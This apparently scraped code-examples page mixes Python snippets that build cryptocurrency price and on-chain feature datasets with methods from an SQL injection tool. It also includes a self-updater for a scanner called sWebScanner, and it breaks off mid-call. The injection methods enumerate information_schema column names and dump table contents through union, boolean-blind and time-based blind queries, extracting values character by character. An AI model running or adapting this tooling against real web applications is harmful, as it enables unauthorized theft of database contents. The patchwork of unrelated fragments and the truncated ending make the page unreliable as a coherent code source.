        # ATRP is the ATR expressed as a percentage of the closing price, so it is already scale-free
        ta_picked['atrp_14'] = ta.atrp_14

        # Percentage Volume Oscillator (PVO) is a momentum volume oscillator used in technical analysis
        #   to evaluate and measure volume surges and to compare trading volume to the average longer-term volume.
        # PVO does not analyze price; it is based solely on volume.
        #  It compares fast and slow volume moving averages by showing how short-term volume differs from
        #  the average volume over the longer term.
        #  Since it does not take the price trend into account (only volume data are used),
        #  this technical indicator cannot be used alone to predict changes in a trend.
        ta_picked['pvo_12_26'] = ta.pvo_12_26

        # IGNORED: tsi, wd, adx,

        #lagged_stats = pd.concat([ohlcv_stats] + [builder.make_lagged(ohlcv_stats, i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner')

        # Build the dataframe with base features
        # lagged_close = pd.concat([ohlcv.close.pct_change()] + [builder.make_lagged(ohlcv.close.pct_change(), i) for i in range(1,10+1)], axis='columns', verify_integrity=True, sort=True, join='inner')
        # lagged_close.columns = ['close_pct'] + ['close_pct_lag-{}'.format(i) for i in range(1, W +1)]

        ohlc = ohlcv[['close', 'volume']].pct_change()
        lagged_ohlc = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')

        # Add lagged features to the dataframe
        improved_df = pd.concat(
            [ohlcv_stats, lagged_ohlc, cm_picked, ta_picked],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')

        # Drop the first 30 rows
        improved_df = improved_df[30:]
        # Drop columns whose values are all nan or inf
        with pd.option_context('mode.use_inf_as_na',
                               True):  # Set option temporarily
            improved_df = improved_df.dropna(axis='columns', how='all')
        # Save the dataframe
        improved_df.to_csv(
            'data/datasets/all_merged/csv/{}_improved.csv'.format(
                _sym.lower()),
            sep=',',
            encoding='utf-8',
            index=True,
            index_label='Date')
        improved_df.to_excel(
            'data/datasets/all_merged/excel/{}_improved.xlsx'.format(
                _sym.lower()),
            index=True,
            index_label='Date')
        unlagged_df = improved_df.loc[:, [
            c for c in improved_df.columns if '_lag' not in c
        ]]
        unlagged_df['target_pct'] = _target.loc[improved_df.index]['pct']
        unlagged_df['target_binary_bin'] = _target.loc[
            improved_df.index]['binary_bin']
        plot_correlation_matrix(
            unlagged_df.corr(),
            unlagged_df.columns,
            title='{} Correlation matrix'.format(_sym),
            save_to='data/datasets/all_merged/{}_improved_corr.png'.format(
                _sym))
        #decompose_dataframe_features('all_merged', _sym+'_improved', unlagged_df)
        # Add symbol to index
        index[_sym] = {
            'csv':
            'data/datasets/all_merged/csv/{}_improved.csv'.format(
                _sym.lower()),
            'xls':
            'data/datasets/all_merged/excel/{}_improved.xlsx'.format(
                _sym.lower()),
            'target_csv':
            'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls':
            'data/datasets/all_merged/excel/{}_target.xlsx'.format(
                _sym.lower()),
            'features': {
                'improved': [c for c in improved_df.columns],
            }
        }
        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index_improved.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
    # Find common features
    common_features = []
    for _sym, entry in index.items():
        features = entry['features']['improved']
        if not common_features:  # if common_features is empty, common_features are all the current features
            common_features = features
        not_common_features = []
        for f in common_features:  # remove features from common_features which are not in features
            if f not in features:
                not_common_features.append(f)
        for f in not_common_features:
            common_features.remove(f)
    for _sym, entry in index.items():
        entry['features']['common'] = common_features
    # Save index again
    with open('data/datasets/all_merged/index_improved.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
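convergence_between_series, used for the ADI feature above, is defined elsewhere. A minimal sketch consistent with the comment's idea (fit a line to each series over a rolling window and compare the signs of the slopes) might look like this; the window semantics and the +1/-1 encoding are assumptions:

import numpy as np
import pandas as pd

def convergence_between_series(s1, s2, W):
    # Hypothetical sketch: +1 where the two series trend in the same
    # direction over the last W points (slopes share a sign), -1 where
    # they diverge, NaN while the rolling window is still filling up.
    def slope(window):
        x = np.arange(len(window))
        m, _ = np.polyfit(x, window, 1)
        return m

    m1 = s1.rolling(W).apply(slope, raw=True)
    m2 = s2.rolling(W).apply(slope, raw=True)
    return np.sign(m1 * m2)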
Exemple #46
    def run_content(self):

        if len(self.columns_name) == 0:
            SqliColumns.get_columns(self)

        # Unpack the enumerated columns and start the injection loop
        for database_name in self.columns_name:
            for table_name in self.columns_name[database_name]:

                # Get the number of rows; if it differs from the configured
                # self.content_count, update self.content_count to match
                content_counts = self.get_content_count(database_name, table_name)
                if content_counts == 0:
                    logger.warning('Database %s Table %s is empty...' % (database_name, table_name))
                    continue
                elif content_counts != self.content_count:
                    logger.debug('Database %s Table %s content amount change to %d' % (database_name, table_name, content_counts))
                    self.content_count = content_counts

                # Create a PrettyTable to hold the dumped rows
                content = PrettyTable(list(self.columns_name[database_name][table_name]))
                content.padding_width = 1
                content.align = "r"

                # Each table is injected once per row, self.content_count times
                for limits in xrange(self.content_count):

                    # A queue to collect the values returned by the worker threads
                    result = Queue.Queue()

                    # Thread list, collected results, and the final row of values for the table
                    threads = []
                    results = []
                    contents = []

                    # Start the multithreaded injection
                    logger.debug("Start multithreading Sqli...")
                    for column_name in self.columns_name[database_name][table_name]:
                        # One thread injects one column
                        try:
                            t = threading.Thread(target=self.get_content, name='thread for %s' % column_name,
                                                 args=(result, database_name, table_name, column_name, limits))
                            t.start()
                            threads.append(t)
                        except Exception:
                            logger.error('Thread error...')

                    # Wait for all threads to finish
                    for t in threads:
                        t.join()

                    # Drain the queue of returned (column, value) pairs
                    while not result.empty():
                        results.append(result.get())

                    # Order the returned values by the table's column order
                    for i in list(self.columns_name[database_name][table_name]):
                        for item in results:
                            if item[0] == i:
                                contents.append(item[1])
                            else:
                                continue

                    # Insert the row
                    content_str = ','.join(contents)
                    logger.info("Sqli success content is %s" % content_str)
                    content.add_row(contents)

                # Print the table
                logger.debug("Database %s Table %s sqli success..." % (database_name, table_name))
                print "[*] Database %s Table %s content:" % (database_name, table_name)
                print content
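The row-extraction loop above is a fan-out/fan-in pattern: one thread per column, a shared queue for the results, then a reordering pass that restores the table's column order. A stripped-down sketch of the same pattern (the names below are illustrative; the Queue module matches the Python 2 code above):

import threading
import Queue  # Python 2, as in the example above

def fetch_row(columns, worker):
    # worker(result, column) is expected to put a (column, value) tuple
    # onto the shared queue, just as self.get_content does above.
    result = Queue.Queue()
    threads = [threading.Thread(target=worker, args=(result, c)) for c in columns]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    found = {}
    while not result.empty():
        column, value = result.get()
        found[column] = value
    # Restore the table's column order in the returned row
    return [found.get(c, '') for c in columns]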
def build_faceted_dataset(source_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)
    index = {}

    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'],
                          sep=',',
                          encoding='utf-8',
                          index_col='Date',
                          parse_dates=True)
        _target = pd.read_csv(entry['target_csv'],
                              sep=',',
                              encoding='utf-8',
                              index_col='Date',
                              parse_dates=True)

        ta = _df[entry['features']['ta']]
        cm = _df[entry['features']['cm']]

        # Price history facet (Daily variation of ohlc in last W trading days)
        ohlc = _df[['open', 'high', 'low', 'close']].pct_change()
        ohlc.columns = ['open_pct', 'high_pct', 'low_pct', 'close_pct']
        history_facet = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')
        # Price trend facet (REMA/RSMA, MACD, AO, ADX, WD+ - WD-)
        trend_facet = ta[[
            "rsma_5_20", "rsma_8_15", "rsma_20_50", "rema_5_20", "rema_8_15",
            "rema_20_50", "macd_12_26", "ao_14", "adx_14", "wd_14"
        ]]
        # Volatility facet (CMO, ATRp)
        volatility_facet = ta[["cmo_14", "atrp_14"]]
        # Volume facet (Volume pct, PVO, ADI, OBV)
        volume_facet = pd.concat([
            _df.volume.pct_change().replace([np.inf, -np.inf], 0),
            ta[["pvo_12_26", "adi", "obv"]]
        ],
                                 axis='columns',
                                 verify_integrity=True,
                                 sort=True,
                                 join='inner')
        # On-chain facet
        cm_1 = cm.reindex(columns=[
            'adractcnt', 'txtfrvaladjntv', 'isstotntv', 'feetotntv', 'splycur',
            'hashrate', 'txtfrcount'
        ]).pct_change()
        cm_2 = cm.reindex(columns=['isscontpctann'])
        chain_facet = pd.concat([cm_1, cm_2],
                                axis='columns',
                                verify_integrity=True,
                                sort=True,
                                join='inner')

        # Drop columns whose values are all nan or inf from each facet
        with pd.option_context('mode.use_inf_as_na',
                               True):  # Set option temporarily
            history_facet = history_facet.dropna(axis='columns', how='all')
            trend_facet = trend_facet.dropna(axis='columns', how='all')
            volatility_facet = volatility_facet.dropna(axis='columns',
                                                       how='all')
            volume_facet = volume_facet.dropna(axis='columns', how='all')
            chain_facet = chain_facet.dropna(axis='columns', how='all')

        improved_df = pd.concat([
            history_facet, trend_facet, volatility_facet, volume_facet,
            chain_facet
        ],
                                axis='columns',
                                verify_integrity=True,
                                sort=True,
                                join='inner')
        # Drop the first 30 rows
        improved_df = improved_df[30:]
        # Save the dataframe
        improved_df.to_csv(
            'data/datasets/all_merged/csv/{}_faceted.csv'.format(_sym.lower()),
            sep=',',
            encoding='utf-8',
            index=True,
            index_label='Date')
        improved_df.to_excel(
            'data/datasets/all_merged/excel/{}_faceted.xlsx'.format(
                _sym.lower()),
            index=True,
            index_label='Date')

        # Add symbol to index
        index[_sym] = {
            'csv':
            'data/datasets/all_merged/csv/{}_faceted.csv'.format(_sym.lower()),
            'xls':
            'data/datasets/all_merged/excel/{}_faceted.xlsx'.format(
                _sym.lower()),
            'target_csv':
            'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls':
            'data/datasets/all_merged/excel/{}_target.xlsx'.format(
                _sym.lower()),
            'features': {
                'price_history': [c for c in history_facet.columns],
                'trend': [c for c in trend_facet.columns],
                'volatility': [c for c in volatility_facet.columns],
                'volume': [c for c in volume_facet.columns],
                'chain': [c for c in chain_facet.columns],
            }
        }
        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index_faceted.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
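builder.make_lagged, used by both dataset builders, is assumed here to shift the frame by i rows and suffix the column names; the '_lag-N' naming matches the commented-out code in build_improved_dataset. A minimal sketch under that assumption:

import pandas as pd

def make_lagged(df, lag):
    # Hypothetical sketch: each row carries the values observed `lag`
    # periods earlier; the rename keeps pd.concat(verify_integrity=True)
    # from choking on duplicate column names.
    lagged = df.shift(lag)
    lagged.columns = ['{0}_lag-{1}'.format(c, lag) for c in df.columns]
    return lagged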
Exemple #48
    def get_content(self, result, database_name, table_name, column_name, limits):

        # Start injecting the row content
        content_len = 0
        logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits))

        logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Inject the length of this row's value
            logger.debug("Start %dth content length sqli..." % (limits + 1))

            content_len = normal_injection(select="length(`" + column_name + "`)",
                                           source=database_name + "." + table_name,
                                           limit=limits,
                                           dealpayload=self.dealpayload,
                                           data=self.Data, isCount=True,
                                           sqlirequest=self.sqlirequest
                                           )

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # Then inject the content itself
            logger.debug("Start %dth content sqli..." % (limits + 1))

            content = normal_injection(select="`" + column_name + "`",
                                       source=database_name + "." + table_name,
                                       limit=limits,
                                       dealpayload=self.dealpayload,
                                       data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                       )

            logger.debug("Content sqli success...The content is %s..." % content)

            # Put the (column_name, content) tuple on the result queue
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Inject the content length

            retVal = build_injection(select="length(`" + column_name + "`)",
                                     source=database_name + "." + table_name,
                                     limit=limits,
                                     dealpayload=self.dealpayload, data=self.Data,
                                     lens=self.len,
                                     isCount=True, sqlirequest=self.sqlirequest)
            content_len = int(retVal)

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # Then inject the content, one character at a time
            # Reset content
            content = ""
            logger.debug("Start %dth content sqli..." % (limits + 1))

            for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False):
                retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
                                         source=database_name + "." + table_name,
                                         limit=limits,
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                         isStrings=True, sqlirequest=self.sqlirequest)
                content += chr(retVal)

            logger.debug("Content sqli success...The content is %s..." % content)

            # Put the (column_name, content) tuple on the result queue
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # Inject the content length

            retVal = time_injection(select="length(`" + column_name + "`)",
                                    source=database_name + "." + table_name,
                                    limit=limits,
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                    isCount=True, sqlirequest=self.sqlirequest)
            content_len = int(retVal)

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # Then inject the content, one character at a time
            # Reset content
            content = ""
            logger.debug("Start %dth content sqli..." % (limits + 1))

            for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False):
                retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
                                        source=database_name + "." + table_name,
                                        limit=limits,
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                        isStrings=True, sqlirequest=self.sqlirequest)
                content += chr(retVal)

            logger.debug("Content sqli success...The content is %s..." % content)

            # Put the (column_name, content) tuple on the result queue
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def build_old_dataset():
    ohlcv_index = load_preprocessed('ohlcv')
    cm_index = load_preprocessed('coinmetrics.io')
    #social_index = load_preprocessed('cryptocompare_social')
    index = {}
    for _sym in ohlcv_index.keys():
        if _sym not in cm_index:
            logger.warning('Missing blockchain data for {}'.format(_sym))
            continue
        # if not _sym in social_index:
        #     logger.warning('Missing social data for {}'.format(_sym))
        #     continue
        logger.info('Building {}'.format(_sym))
        ohlcv = pd.read_csv(ohlcv_index[_sym]['csv'],
                            sep=',',
                            encoding='utf-8',
                            index_col='Date',
                            parse_dates=True)
        cm = pd.read_csv(cm_index[_sym]['csv'],
                         sep=',',
                         encoding='utf-8',
                         index_col='Date',
                         parse_dates=True)
        #social = pd.read_csv(social_index[_sym]['csv'], sep=',', encoding='utf-8',
        #                index_col='Date', parse_dates=True)
        # Build resampled OHLCV and TA features
        ohlcv_3d = builder.periodic_ohlcv_pct_change(ohlcv,
                                                     period=3,
                                                     label=True)
        ohlcv_7d = builder.periodic_ohlcv_pct_change(ohlcv,
                                                     period=7,
                                                     label=True)
        ohlcv_30d = builder.periodic_ohlcv_pct_change(ohlcv,
                                                      period=30,
                                                      label=True)
        ta = builder.features_ta(ohlcv)
        ta_3d = builder.period_resampled_ta(ohlcv, period=3)
        ta_7d = builder.period_resampled_ta(ohlcv, period=7)
        ta_30d = builder.period_resampled_ta(ohlcv, period=30)
        # Build Coinmetrics blockchain stats
        cm_pct = feature_quality_filter(builder.pct_change(cm))
        # Build Cryptocompare social stats
        #social_pct = feature_quality_filter(builder.pct_change(social))
        # Build target percent variation
        target_pct = builder.target_price_variation(ohlcv['close'], periods=1)
        target_class = builder.target_discrete_price_variation(target_pct)
        target_labels = builder.target_label(target_class,
                                             labels=['SELL', 'HOLD', 'BUY'])
        target_bin = builder.target_binned_price_variation(target_pct,
                                                           n_bins=3)
        target_bin_binary = builder.target_binned_price_variation(target_pct,
                                                                  n_bins=2)
        target_bin_labels = builder.target_label(
            target_bin, labels=['SELL', 'HOLD', 'BUY'])
        target_bin_binary_labels = builder.target_label(target_bin_binary,
                                                        labels=['SELL', 'BUY'])
        # Merge all the datasets
        dataframes = [
            ohlcv, ohlcv_3d, ohlcv_7d, ohlcv_30d, ta, ta_3d, ta_7d, ta_30d,
            cm_pct
        ]  #, social_pct]
        df = pd.concat(dataframes,
                       axis='columns',
                       verify_integrity=True,
                       sort=True,
                       join='inner')
        target = pd.concat([
            target_pct, target_class, target_bin, target_bin_binary,
            target_labels, target_bin_labels, target_bin_binary_labels
        ],
                           axis=1)
        target.columns = [
            'pct', 'class', 'bin', 'binary_bin', 'labels', 'bin_labels',
            'binary_bin_labels'
        ]
        target = target.loc[df.first_valid_index():df.last_valid_index()]
        # Save resulting dataset both in CSV and Excel format
        logger.info('Saving {}'.format(_sym))

        df.to_csv('data/datasets/all_merged/csv/{}.csv'.format(_sym.lower()),
                  sep=',',
                  encoding='utf-8',
                  index=True,
                  index_label='Date')
        df.to_excel('data/datasets/all_merged/excel/{}.xlsx'.format(
            _sym.lower()),
                    index=True,
                    index_label='Date')
        target.to_csv('data/datasets/all_merged/csv/{}_target.csv'.format(
            _sym.lower()),
                      sep=',',
                      encoding='utf-8',
                      index=True,
                      index_label='Date')
        target.to_excel('data/datasets/all_merged/excel/{}_target.xlsx'.format(
            _sym.lower()),
                        index=True,
                        index_label='Date')

        # Add symbol to index
        index[_sym] = {
            'csv':
            'data/datasets/all_merged/csv/{}.csv'.format(_sym.lower()),
            'xls':
            'data/datasets/all_merged/excel/{}.xlsx'.format(_sym.lower()),
            'target_csv':
            'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls':
            'data/datasets/all_merged/excel/{}_target.xlsx'.format(
                _sym.lower()),
            'features': {
                'ohlcv': [c for c in ohlcv.columns],
                'ohlcv_3d': [c for c in ohlcv_3d.columns],
                'ohlcv_7d': [c for c in ohlcv_7d.columns],
                'ohlcv_30d': [c for c in ohlcv_30d.columns],
                'ta': [c for c in ta.columns],
                'ta_3d': [c for c in ta_3d.columns],
                'ta_7d': [c for c in ta_7d.columns],
                'ta_30d': [c for c in ta_30d.columns],
                'cm_pct': [c for c in cm_pct.columns],
                #'social_pct': [c for c in social_pct.columns],
            }
        }

        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
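The builder.target_* helpers are defined elsewhere. Under the assumption that target_price_variation is the forward percent change of the close and that the binned variant discretizes it into equal-frequency bins, a minimal sketch:

import pandas as pd

def target_price_variation(close, periods=1):
    # Hypothetical sketch: percent change over the next `periods` rows,
    # aligned to the current row (the value we want to predict).
    return close.pct_change(periods=periods).shift(-periods)

def target_binned_price_variation(pct, n_bins=3):
    # Hypothetical sketch: quantile bins keep the classes roughly balanced;
    # labels are 0..n_bins-1 (e.g. SELL/HOLD/BUY for n_bins=3).
    return pd.qcut(pct, q=n_bins, labels=False)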
Exemple #50
def update():
    success = False
    NewVersion = getLatestRevision()
    if Version == NewVersion:
        logger.info("Version {0} is already the latest version".format(Version))
        exit(0)
    elif Version < NewVersion:
        logger.info("Current version: {0}, latest version: {1}".format(
            Version, NewVersion))
    else:
        logger.info("Version {0} is already the latest version".format(Version))
        exit(0)
    message = input("Update? [y/N] ")
    if message == "y":
        directory = os.path.abspath(BASE_DIR)
    else:
        exit(0)
    try:
        # Probe whether the install directory is writable
        open(os.path.join(directory, "sWebScanner.py"), "w+b")
    except Exception as ex:
        logger.error("Unable to update the directory contents: '{0}'".format(ex))
    else:
        for wildcard in ('*', "."):
            # glob.glob matches every file that fits the pattern and returns them as a list
            for _ in glob.glob(os.path.join(directory, wildcard)):
                try:
                    if os.path.isdir(_):
                        shutil.rmtree(_)
                    else:
                        os.remove(_)
                except OSError:
                    pass
        if glob.glob(os.path.join(directory, '*')):
            errMsg = "Unable to clear the contents of directory '{0}'".format(directory)
            logger.error(errMsg)
        else:
            try:
                archive = urllib.request.urlretrieve(ZIPBALL_PAGE)[0]

                with zipfile.ZipFile(archive) as f:
                    for info in f.infolist():
                        info.filename = re.sub(r"sWebScanner-main/", "",
                                               info.filename)
                        if info.filename:
                            f.extract(info, directory)

                filepath = os.path.join(BASE_DIR, "config", "config.py")
                if os.path.isfile(filepath):
                    with open(filepath, 'r', encoding='utf-8') as f:
                        nowVersion = re.search(
                            r"(?m)^Version\s*=\s*['\"]([^'\"]+)",
                            f.read()).group(1)
                        logger.info("更新到最新版本:{0}".format(nowVersion))
                        os.remove(archive)
                        success = True
            except Exception as ex:
                logger.error("抱歉!!!更新无法完成 ('{0}')".format(ex))

    if not success:
        logger.info("请前往Github重新下载")
        logger.info("下载地址:{0}".format(GIT_REPOSITORY))
Exemple #51
    def get_columns(self):

        # If tables_name has not been populated yet, enumerate the tables first
        if len(self.tables_name) == 0:
            SqliTables.get_tables(self)

        # First, iterate over each database_name
        for database_name in self.tables_name:

            # Each database_name gets its own dict
            self.columns_name[database_name] = {}

            # Run a columns_name pass for each table_name
            for table_name in self.tables_name[database_name]:

                # Store each table's column names in a list
                columns_name = []

                # Start enumerating the column names
                logger.debug(
                    "Start sqli databases %s's tables %s's columns..." %
                    (database_name, table_name))

                # GET requests first
                if self.sqlirequest == "GET":
                    logger.debug(
                        "The sqlirequest is %s, start sqli columns..." %
                        self.sqlirequest)

                    if self.sqlimethod == "normal":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        # First inject the number of columns

                        columns_number = normal_injection(
                            select='COUNT(*)',
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isCount=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "Columns amount sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        # Each iteration extracts one column
                        for i in trange(int(columns_number),
                                        desc="Column sqli...",
                                        leave=False,
                                        disable=True):
                            # First, the length of the column name
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            column_name_len = normal_injection(
                                select='length(column_name)',
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isCount=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # Then inject the column name

                            column_name = normal_injection(
                                select='column_name',
                                source='information_schema.columns',
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # Append the column name to the list
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "build":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = build_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns amount sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # Then inject the length of the column name
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = build_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                lens=self.len,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # Then inject the column name, one character at a time
                            # Reset column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = build_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    lens=self.len,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # Append the column name to the list
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "time":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = time_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns amount sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # Then inject the length of the column name
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = time_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                times=self.time,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # Then inject the column name, one character at a time
                            # Reset column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = time_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    times=self.time,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # Append the column name to the list
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                # Then handle POST requests
                elif self.sqlirequest == "POST":
                    logger.debug(
                        "The sqlirequest is %s, start sqli columns..." %
                        self.sqlirequest)

                    if self.sqlimethod == "normal":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        # First inject the number of columns

                        columns_number = normal_injection(
                            select='COUNT(*)',
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isCount=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "Columns amount sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        # Each iteration extracts one column
                        for i in trange(int(columns_number),
                                        desc="Column sqli...",
                                        leave=False,
                                        disable=True):

                            # First, the length of the column name
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            column_name_len = normal_injection(
                                select='length(column_name)',
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isCount=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # Then inject the column name

                            column_name = normal_injection(
                                select='column_name',
                                source='information_schema.columns',
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # Append the column name to the list
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "build":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = build_injection(
